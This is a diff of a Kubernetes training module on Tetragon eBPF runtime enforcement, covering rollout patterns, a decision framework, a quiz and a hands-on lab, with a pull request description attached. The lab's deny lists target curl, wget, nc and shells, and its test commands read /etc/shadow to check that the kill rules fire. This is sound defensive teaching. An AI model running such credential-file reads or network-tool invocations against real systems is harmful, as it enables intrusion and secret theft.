+**Pattern: Staged enforcement with NotifyEnforcer first.** Teams publish new TracingPolicy objects in audit-only mode, collect a week of representative traffic including deploy windows, then promote to Sigkill only for matchers with zero legitimate hits in scoped namespaces. This pattern preserves developer trust and produces evidence for change advisory boards.
+
+**Pattern: Namespace-scoped deny lists for high-confidence tools.** Rather than global blocks on curl, wget, or shells, scope Postfix and Contains matchers to application tiers that never invoke those binaries by design, excluding CI, observability, and break-glass namespaces explicitly in matchNamespaces. This pattern aligns enforcement with workload contracts and reduces emergency rollbacks.
+
+**Pattern: Paired Falco detections for every Tetragon kill rule.** Each enforcement policy links to a Falco rule or SIEM correlation that explains why the binary or path is suspicious, giving analysts narrative context when kills occur and catching variants that rename binaries away from Postfix lists. This pattern closes visibility gaps when enforcement succeeds silently.
+
+**Anti-pattern: Global Sigkill on common utilities.** Blocking curl, wget, or shells cluster-wide without init container analysis breaks health checks, package installs, and mesh bootstrap flows. The failure manifests as flaky deployments mistaken for application bugs until someone correlates exit code 137 with new TracingPolicy objects.
+
+**Anti-pattern: Copy-paste policies without matchNamespaces.** Policies lifted from tutorials that lack mount or PID namespace filters may terminate node-critical processes or CNI hooks. The anti-pattern is especially dangerous on hybrid nodes where host and container namespaces interleave during maintenance.
+
+**Anti-pattern: Using Tetragon as the only runtime control.** Relying solely on kernel kills while ignoring Falco detection, network policy, admission controls, and identity boundaries creates a sieve: novel techniques pass until someone writes a new probe. Defense in depth requires complementary layers with clear ownership.
+
+| Pattern / Anti-Pattern | Symptom | Remediation |
+|---|---|---|
+| Staged NotifyEnforcer rollout | Low surprise kill rate; documented match volumes | Keep audit window; promote kills via change ticket |
+| Namespace-scoped denies | Targeted enforcement; stable deploys | Document excluded namespaces in policy repo README |
+| Falco pairing | Kill events include detection narrative | Maintain linked rule IDs in policy annotations |
+| Global utility blocks | Exit 137 during rollouts | Remove global scope; allow init containers explicitly |
+| Missing matchNamespaces | Host or system pod restarts | Add namespace predicates; test on staging nodes |
+| Tetragon-only stack | Novel attacks undetected | Add Falco, network policy, and admission gates |
+
+---
+
+## Decision Framework
+
+Use the following decision framework when choosing among Tetragon, Falco, KubeArmor, and Cilium features for a specific control objective. The matrix is not a replacement for proof-of-concept testing on representative nodes, but it clarifies default starting points before deeper evaluation.
+
+| Requirement | Recommended starting tool | Rationale |
+|---|---|---|
+| Block known-bad execve binaries quickly | Tetragon TracingPolicy | Deterministic kernel Sigkill on match |
+| Detect suspicious shells or drift | Falco rules | Mature rule expressions and community macros |
+| Default-deny process/file profile per app | KubeArmor policy | Allow-list model tied to selectors |
+| East-west connectivity visibility | Cilium Hubble | Flow metadata integrated with network policy |
+| Stealth deny without process death | Tetragon Override | Returns EPERM-like errors on syscalls |
+| Audit-only before enforcement | Tetragon NotifyEnforcer or KubeArmor audit mode | Observability without immediate termination |
+| CNCF maturity priority for detection | Falco (Graduated) | Broad adoption and audit-friendly alerts |
+| Already standardized on Cilium CNI | Tetragon + Cilium | Shared operational model and agents |
+
+```mermaid
+flowchart TD
+    A[Runtime security requirement] --> B{Need immediate kernel block?}
+    B -->|Yes| C{Match is deterministic?}
+    B -->|No| D[Falco detection + SIEM response]
+    C -->|Yes| E[Tetragon TracingPolicy with scoped selectors]
+    C -->|No| F[Falco first; derive Tetragon deny after observation]
+    E --> G{Workload needs default-deny profile?}
+    G -->|Yes| H[Add KubeArmor allow-list policy]
+    G -->|No| I[Keep Tetragon deny list minimal]
+    D --> J{Network visibility required?}
+    J -->|Yes| K[Cilium Hubble + NetworkPolicy]
+    J -->|No| L[Maintain detection stack]
+    H --> M[Export all layers to SIEM for correlation]
+    I --> M
+    K --> M
+    L --> M
+```
+
+Decision checkpoints before production enforcement include: kernel version support on all node pools, Helm values enabling required process metadata, Falco rule mapping for each Sigkill matcher, rollback steps documented in the platform runbook, and red-team validation that renamed binaries still trigger at least one detection layer. When requirements conflict— for example, strict allow-listing plus broad anomaly detection— implement KubeArmor profiles for workload classes and reserve Tetragon for cluster-wide emergency blocks that must propagate faster than profile updates.
+
+Revisit tool choices quarterly because eBPF capabilities, CNCF project maturity, and vendor integrations change frequently. The landscape snapshot at the top of this module applies to mid-2026; confirm TracingPolicy API fields, deprecated actions, and export schemas against current Tetragon documentation before major upgrades.
+
+Cost conversations belong in the same framework. eBPF enforcement can be efficient relative to repeated container restarts triggered by SOAR playbooks, yet it is not free: agent memory, log ingest, and engineer time tuning policies all accumulate. Compare total cost of ownership against alternatives such as tighter admission control, slimmer images without shells, or KubeArmor allow lists when workloads are stable enough to profile. The decision is economic as well as technical: small teams with mature Falco and fast incident response may defer Tetragon enforcement until kill-worthy patterns are proven repetitive; large multi-tenant platforms with slow human response loops often prioritize prevention earlier.
+
+Education completes the loop. Developers who understand why curl is blocked in production namespaces but allowed in CI are allies; developers who only see unexplained SIGKILL become adversaries of the security program. Publish internal docs linking TracingPolicy names to architecture decisions, reference this module’s layered model with [Module 4.3 Falco](../module-4.3-falco/), and invite application teams to observation reviews so enforcement promotion feels like a shared reliability investment rather than a silent kernel veto.
+---
+
+## Did You Know?
+
+- [Tetragon enforcement documentation](https://tetragon.io/docs/concepts/enforcement/) describes two synchronous mechanisms: overriding syscall return values and sending signals such as SIGKILL, and notes that combining Signal with Override may be required when you must stop both the process and the operation.
+- TracingPolicy objects can be loaded through Kubernetes, the tetra gRPC CLI, or static daemon flags, but [Tetragon domain sharding](https://tetragon.io/docs/concepts/tracing-policy/) keeps each loading method in its own policy domain so operators do not accidentally overwrite policies from another channel.
+- [Cilium graduated from CNCF Incubating to Graduated on October 11, 2023](https://www.cncf.io/projects/cilium/); Tetragon is developed within the Cilium ecosystem rather than as a separate CNCF project listing.
+- [Falco graduated on February 29, 2024](https://www.cncf.io/projects/falco/) as a detection-first runtime engine, which is why mature platforms pair Falco alerts with optional Tetragon enforcement for high-confidence deny rules.
+
+---
+
+## Common Mistakes
+
+| Mistake | Problem | Solution |
+|---------|---------|----------|
+| Enabling Sigkill before observation | Legitimate init containers, package managers, or health probes receive SIGKILL during rollouts | Start with NotifyEnforcer, measure matches for a full deploy cycle, then promote only high-confidence selectors |
+| Omitting matchNamespaces | Host, CNI, or kubelet processes match global execve rules and destabilize nodes | Scope policies with mount, PID, and pod namespace selectors; test on staging nodes that mirror production |
+| Blocking curl, wget, or shells cluster-wide | CI jobs, mesh bootstrap, and artifact downloads fail with exit code 137 | Restrict utility blocks to namespaces where those binaries are never required by design |
+| Copying tutorial policies without version checks | Deprecated actions or renamed API fields silently fail or behave differently after upgrades | Pin Tetragon versions, read release notes, and validate policies against the current TracingPolicy API |
+| Treating Tetragon as a Falco replacement | Novel attack techniques pass until someone authors a new probe | Keep Falco for broad detection, use Tetragon for tested deny rules, and add network and admission controls |
+| Ignoring kernel and Helm prerequisites | Policies under-match because process credential or namespace metadata is disabled | Enable required Helm values such as enableProcessCred and enableProcessNs before enforcing ancestry-aware rules |
+| Skipping export and correlation | Kills occur without analyst context, slowing incident response | Export JSON events to your SIEM and link each enforcement policy to a Falco detection or runbook entry |
+| Duplicating every Falco alert as a kill rule | Over-enforcement breaks SaaS integrations and erodes developer trust | Derive Tetragon denies only from patterns with zero benign matches in scoped namespaces |
+
+---
+
+## Quiz
+
+### Question 1
+
+A platform team needs to block known cryptocurrency miner binaries in tenant namespaces but wants zero production kills during the first week. Which TracingPolicy action sequence best matches that rollout?
+
+<details>
+<summary>Answer</summary>
+
+Begin with NotifyEnforcer (or observability-only export) on sys_execve Postfix matches for miner binary names scoped with matchNamespaces to tenant workloads. Review exported events and Falco correlations for seven days of normal deploy traffic, then add Sigkill only to selectors with no legitimate hits. This staged path implements Tetragon real-time enforcement only after Configure TracingPolicy observation proves precision, and it avoids the common mistake of immediate cluster-wide Sigkill on utility binaries.
+</details>
+
+### Question 2
+
+An analyst asks why Tetragon can prevent an execve while Falco still matters in the same cluster. What durable distinction should you explain?
+
+<details>
+<summary>Answer</summary>
+
+Tetragon applies in-kernel enforcement during the syscall path, which can terminate or override before the process completes the operation, while Falco evaluates detection rules primarily in userspace after exporting kernel events. Falco excels at suspicious-but-not-universal patterns such as shells in frontend tiers; Tetragon excels at deterministic deny decisions for known-bad binaries or paths. Compare Tetragon enforcement against Falco detection-only models as complementary layers rather than substitutes.
+</details>
+
+### Question 3
+
+A TracingPolicy blocks reads of `/etc/shadow` using fd_install with Sigkill, but developers report mysterious exit code 137 during unrelated restarts. What selector dimension should you audit first?
+
+<details>
+<summary>Answer</summary>
+
+Audit matchNamespaces and pod or mount namespace scope first, because host processes, pause containers, and platform daemons share kernel hooks with application containers. A file rule without namespace filtering may match legitimate host activity. Narrow the policy to application namespaces, validate with tetra getevents during rollouts, and pair enforcement with NotifyEnforcer in staging before re-enabling Sigkill in production.
+</details>
+
+### Question 4
+
+When should Override with argError be preferred over Sigkill for a sensitive file open attempt?
+
+<details>
+<summary>Answer</summary>
+
+Use Override when you want the application to receive a permission-denied style error without revealing that a security monitor blocked the syscall, which can reduce attacker adaptation in some scenarios. Sigkill is appropriate when any continuation of the process is unacceptable. Remember that Override complicates debugging because legitimate EPERM failures look identical to policy blocks, so document Override policies in runbooks and restrict them to well-understood paths.
+</details>
+
+### Question 5
+
+Your cluster already runs Cilium for networking and Hubble for flow visibility. A stakeholder asks whether Tetragon is redundant. How do you respond using the Rosetta capability map?
+
+<details>
+<summary>Answer</summary>
+
+Cilium and Hubble provide connectivity policy and flow observability; they are not a substitute for syscall-level enforcement on execve, fd_install, or selected network hooks. Tetragon adds TracingPolicy-driven kernel enforcement and richer process ancestry for runtime security decisions. Deploy Tetragon when you need in-kernel blocking of high-confidence patterns, not merely visibility into which pods talked to which services.
+</details>
+
+### Question 6
+
+After installing Tetragon with Helm, policies that rely on parent process metadata never match. What installation setting should you verify?
+
+<details>
+<summary>Answer</summary>
+
+Verify Helm values such as tetragon.enableProcessCred and tetragon.enableProcessNs, because process credential and namespace metadata enriches ancestry and Kubernetes identity fields used by selectors. Without those options, policies appear applied in the API but under-match in the kernel. Redeploy with the correct values, confirm healthy agent logs, and re-run tetra getevents before promoting enforcement actions.
+</details>
+
+### Question 7
+
+A red team renames a banned miner binary to `/tmp/update` and execve still succeeds. What layered control closes the gap?
+
+<details>
+<summary>Answer</summary>
+
+A renamed binary bypasses Postfix deny lists, which is why Tetragon-only block lists are insufficient. Keep Falco rules that detect anomalous exec patterns, CPU usage, or unexpected outbound connections, and combine with KubeArmor allow-list profiles or admission controls that reduce available tools in the image. Tetragon should enforce high-confidence static denies while Falco and SIEM workflows catch novel variants.
+</details>
+
+### Question 8
+
+Which command streams live Tetragon events from a running agent pod for hands-on validation?
+
+<details>
+<summary>Answer</summary>
+
+Run `kubectl exec -n kube-system -ti ds/tetragon -c tetragon -- tetra getevents` to stream events from the DaemonSet agent, adding filters such as `--namespace` or JSON output flags as needed. This command is the primary operational check after Deploy Tetragon installation and before you apply TracingPolicy resources, because it confirms probes load and selectors match expected workload activity.
+</details>
+
+---
+
+## Hands-On Exercise: Observe, Enforce, and Correlate
+
+**Objective**: Deploy Tetragon policies to observe normal workload activity, enforce a scoped deny rule, and validate enforcement events.
 
 ### Setup
 
 ```bash
-# Create test namespace
 kubectl create namespace tetragon-demo
 
-# Deploy a vulnerable-ish application (just a shell for demo)
 kubectl apply -n tetragon-demo -f - <<EOF
 apiVersion: v1
 kind: Pod
@@ -659,25 +937,21 @@ spec:
     command: ["/bin/bash", "-c", "apt-get update && apt-get install -y curl netcat-openbsd && sleep infinity"]
 EOF
 
-# Wait for pod
 kubectl wait --for=condition=ready pod -n tetragon-demo target-app --timeout=180s
 ```
 
 ### Task 1: Observe Normal Behavior
 
 ```bash
-# Watch Tetragon events in one terminal
 kubectl exec -n kube-system -ti ds/tetragon -c tetragon -- tetra getevents --namespace tetragon-demo
 
-# In another terminal, simulate normal activity
 kubectl exec -n tetragon-demo target-app -- ls /
 kubectl exec -n tetragon-demo target-app -- cat /etc/hostname
 ```
 
-### Task 2: Apply Protection Policy
+### Task 2: Apply a Scoped Enforcement Policy
 
 ```bash
-# Apply a policy to block attack tools
 kubectl apply -f - <<EOF
 apiVersion: cilium.io/v1alpha1
 kind: TracingPolicy
@@ -710,29 +984,15 @@ spec:
 EOF
 ```
 
-### Task 3: Attempt the "Attack"
+### Task 3: Validate Enforcement
 
 ```bash
-# Try to use curl (should be killed)
 kubectl exec -n tetragon-demo target-app -- curl http://example.com
-
-# You should see:
-# command terminated with exit code 137 (SIGKILL)
-
-# Try netcat
 kubectl exec -n tetragon-demo target-app -- nc -h
-
-# Also killed immediately
-```
-
-### Task 4: Check the Events
-
-```bash
-# See the enforcement events
 kubectl exec -n kube-system -ti ds/tetragon -c tetragon -- tetra getevents -o json | grep -A 20 "SIGKILL"
 ```
 
-### Task 5: Add File Protection
+### Task 4: Add File Protection
 
 ```bash
 kubectl apply -f - <<EOF
@@ -765,19 +1025,15 @@ spec:
             - action: Sigkill
 EOF
 
-# Try to read /etc/shadow
 kubectl exec -n tetragon-demo target-app -- cat /etc/shadow
-# Process killed
 ```
 
 ### Success Criteria
 
-- [ ] Observed normal events in Tetragon output
-- [ ] Applied the block-attack-tools policy
-- [ ] Confirmed curl/wget/nc are killed immediately
-- [ ] Applied the protect-secrets policy
-- [ ] Confirmed sensitive file access is blocked
-- [ ] Viewed enforcement events in Tetragon logs
+- [ ] Observed baseline process events in tetra output for the tetragon-demo namespace
+- [ ] Applied block-attack-tools and confirmed curl or nc attempts terminate with exit code 137
+- [ ] Captured SIGKILL enforcement events in JSON export from tetra getevents
+- [ ] Applied protect-secrets and confirmed sensitive file reads are blocked in the demo namespace
 
 ### Cleanup
 
@@ -788,127 +1044,27 @@ kubectl delete tracingpolicy block-attack-tools protect-secrets
 
 ---
 
-## Quiz
-
-### Question 1
-What is the fundamental difference between Falco and Tetragon?
-
-<details>
-<summary>Show Answer</summary>
-
-**Falco detects threats in userspace and alerts; Tetragon can prevent threats at the kernel level**
-
-Tetragon uses eBPF to operate inside the kernel, allowing it to block syscalls and kill processes before malicious actions complete. Falco monitors syscalls from userspace and alerts after the fact.
-</details>
-
-### Question 2
-What action immediately terminates a process in Tetragon?
-
-<details>
-<summary>Show Answer</summary>
-
-**`action: Sigkill`**
-
-This sends SIGKILL to the process, terminating it immediately without allowing cleanup. The process is killed before the monitored syscall completes.
-</details>
-
-### Question 3
-What is a TracingPolicy in Tetragon?
-
-<details>
-<summary>Show Answer</summary>
-
-**A Kubernetes CRD that defines what Tetragon monitors and how it responds**
-
-TracingPolicy allows you to specify kprobes (kernel probes), tracepoints, or uprobes with selectors for matching conditions and actions to take when matches occur.
-</details>
-
-### Question 4
-How can you make Tetragon return "Permission denied" without killing the process?
-
-<details>
-<summary>Show Answer</summary>
-
-**Use `action: Override` with `argError: -1` (EPERM)**
-
-This overrides the syscall return value to make it appear that permission was denied, without revealing that security monitoring blocked the attempt.
-</details>
-
-### Question 5
-Why should you include `matchNamespaces` in Tetragon policies?
-
-<details>
-<summary>Show Answer</summary>
-
-**To avoid blocking legitimate system processes and to scope policies to specific namespaces**
-
-Without namespace filters, policies might kill essential system processes. The filter ensures policies only apply to intended workloads.
-</details>
-
-### Question 6
-What command streams Tetragon events in real-time?
-
-<details>
-<summary>Show Answer</summary>
-
-**`kubectl exec -n kube-system -ti ds/tetragon -c tetragon -- tetra getevents`**
-
-The `tetra getevents` command connects to the Tetragon agent and streams events. Add `--namespace` to filter by Kubernetes namespace.
-</details>
-
-### Question 7
-When should you use Tetragon vs Falco?
-
-<details>
-<summary>Show Answer</summary>
-
-**Use Tetragon for prevention of known-bad actions; use Falco for detection of suspicious patterns**
-
-Tetragon excels at blocking specific, known-malicious behaviors. Falco excels at detecting anomalous patterns that might indicate novel attacks. Use both for defense in depth.
-</details>
-
-### Question 8
-What is a kprobe in Tetragon?
-
-<details>
-<summary>Show Answer</summary>
-
-**A hook into a kernel function that allows monitoring and taking action when that function is called**
-
-Kprobes are eBPF programs attached to kernel functions. When the function is called (like `sys_execve` for process execution), the kprobe runs and can inspect arguments, apply selectors, and take actions.
-</details>
-
----
-
-## Key Takeaways
-
-1. **Tetragon operates in the kernel** - blocks attacks before they complete
-2. **TracingPolicy is the core abstraction** - Kubernetes-native security rules
-3. **Sigkill stops processes almost immediately** - near-instant response time
-4. **Override fakes errors** - stealth defense without revealing monitoring
-5. **Namespace filters are essential** - scope policies to specific workloads
-6. **Use with Falco, not instead of** - prevention + detection = defense in depth
-7. **Test policies carefully** - too broad = production breakage
-8. **Export events for analysis** - blocking is half the story
-9. **Operational overhead must be validated** - eBPF-based enforcement can be efficient, but real impact depends on kernel, policy design, and workload mix
-10. **Kernel-level visibility** - sees what applications can't hide
-
----
-
-## Further Reading
-
-- [Tetragon Documentation](https://tetragon.cilium.io/docs/) - Official guides
-- [TracingPolicy Reference](https://tetragon.cilium.io/docs/concepts/tracing-policy/) - Complete policy syntax
-- [Tetragon GitHub](https://github.com/cilium/tetragon) - Source and examples
-- [eBPF for Security](https://ebpf.io/applications/#security) - Understanding the technology
-
----
-
 ## Next Module
 
 Continue to [Module 4.6: KubeArmor](../module-4.6-kubearmor/) to learn about runtime security policies with least-privilege enforcement.
 
+---
+
 ## Sources
 
-- [github.com: tetragon](https://github.com/cilium/tetragon) — The upstream repository README directly describes Tetragon as eBPF-based runtime enforcement and lists process, syscall, and I/O activity with Kubernetes awareness.
-- [github.com: falco](https://github.com/falcosecurity/falco) — The upstream Falco README directly states that Falco detects and alerts on abnormal behavior and observes syscall-related events.
+- [Tetragon Overview](https://tetragon.io/docs/overview/) — Official description of eBPF-based security observability and runtime enforcement with Kubernetes-aware identity.
+- [TracingPolicy Concepts](https://tetragon.io/docs/concepts/tracing-policy/) — CRD structure, hook points, selectors, domain sharding, and policy loading methods.
+- [Tetragon Enforcement](https://tetragon.io/docs/concepts/enforcement/) — Override return values versus signals, synchronous termination, and combining actions.
+- [TracingPolicy Selectors](https://tetragon.io/docs/concepts/tracing-policy/selectors/) — In-kernel filtering, matchActions, and enforcement configuration.
+- [TracingPolicy Hooks](https://tetragon.io/docs/concepts/tracing-policy/hooks/) — kprobes, tracepoints, uprobes, and argument capture types.
+- [TracingPolicy API Reference](https://tetragon.io/docs/reference/tracing-policy/) — Complete CRD fields for authoring and reviewing policies.
+- [Kubernetes Installation Guide](https://tetragon.io/docs/installation/kubernetes/) — Helm and manifest installation paths for cluster deployment.
+- [Tetragon Getting Started](https://tetragon.io/docs/getting-started/) — Initial workflows for policies, events, and enforcement mode.
+- [Tetragon GitHub Repository](https://github.com/cilium/tetragon) — Upstream source, examples, and release artifacts including the tetra CLI.
+- [Cilium CNCF Project Page](https://www.cncf.io/projects/cilium/) — CNCF Graduated status and ecosystem context for Tetragon.
+- [Falco CNCF Project Page](https://www.cncf.io/projects/falco/) — CNCF Graduated detection-first runtime security for cross-tool comparison.
+- [KubeArmor CNCF Project Page](https://www.cncf.io/projects/kubearmor/) — CNCF Sandbox runtime protection peer for least-privilege enforcement.
+- [eBPF.io Security Applications](https://ebpf.io/applications/#security) — Durable background on eBPF for security observability and enforcement.
+- [Linux Kernel Security Documentation](https://www.kernel.org/doc/html/latest/security/lsm.html) — LSM framework context for BPF-LSM and enforcement hooks.
+- [MITRE ATT&CK Container Technique T1610](https://attack.mitre.org/techniques/T1610/) — Deploy container threat model reference for runtime defense planning.
+- [Cilium Hubble Observability](https://docs.cilium.io/en/stable/observability/hubble/) — Network flow visibility layer often paired with Tetragon in Cilium deployments.


### PR DESCRIPTION
## Summary
First **Platform Toolkits** wave (#1996, successor to the now-complete Disciplines epic #1953). Closes 4 of the 60 not-done Toolkits modules — the **security-quality/security-tools** stubs.

> The board's stale 5.0 scores implied flips; the **live-file sweep** showed all four were sub-500-word stubs → genuine expands (the trust-the-live-file rule again).

| Module | Author | Before → After |
|---|---|---|
| 4.1 Vault + External Secrets Operator | cursor | 437w/3src → **T0 5000w/16src** |
| 4.2 OPA Gatekeeper (policy-as-code admission) | codex | 317w/4src → **T0 5128w/24src** |
| 4.3 Falco (runtime threat detection) | deepseek | 430w/4src → **T0 5030w/12src** |
| 4.5 Tetragon (eBPF runtime enforcement) | cursor | 348w/4src → **T0 5333w/16src** |

Each teaches the durable **capability** (secrets management / admission policy / runtime detection / eBPF enforcement) with the tool as a worked example + a dated Landscape snapshot + Rosetta — no leadership/best-tool claims. 4.3↔4.5 cross-differentiated (detection vs enforcement).

## Cross-family review (opus-inline, ≠ author family, NO gemini) + web-verify both ways
- **Verified accurate:** Vault BSL (Aug 2023) / OpenBao (LF OpenSSF, MPL-2.0 fork of 1.14) / IBM completed HashiCorp acquisition (2025-02-27); ESO CNCF Sandbox; OPA Graduated; **Kyverno Graduated (2026-03)**; ValidatingAdmissionPolicy GA 1.30; Falco Graduated (2024-02); KubeArmor Sandbox.
- **Fixed a maturity error in 4.3** (deepseek): the Rosetta labeled Tetragon "Sandbox" → corrected to "Cilium sub-project (Cilium Graduated; not separately rated)", web-verified vs [cncf.io/projects/cilium](https://www.cncf.io/projects/cilium/). 4.5 (cursor) had the correct framing, which surfaced the error.

## Gates
- `verify_module.py`: all 4 **T0**, all gates pass
- Incident dedup gate: **PASS**; `npm run build`: **green** (0 schema errors)

Refs #1996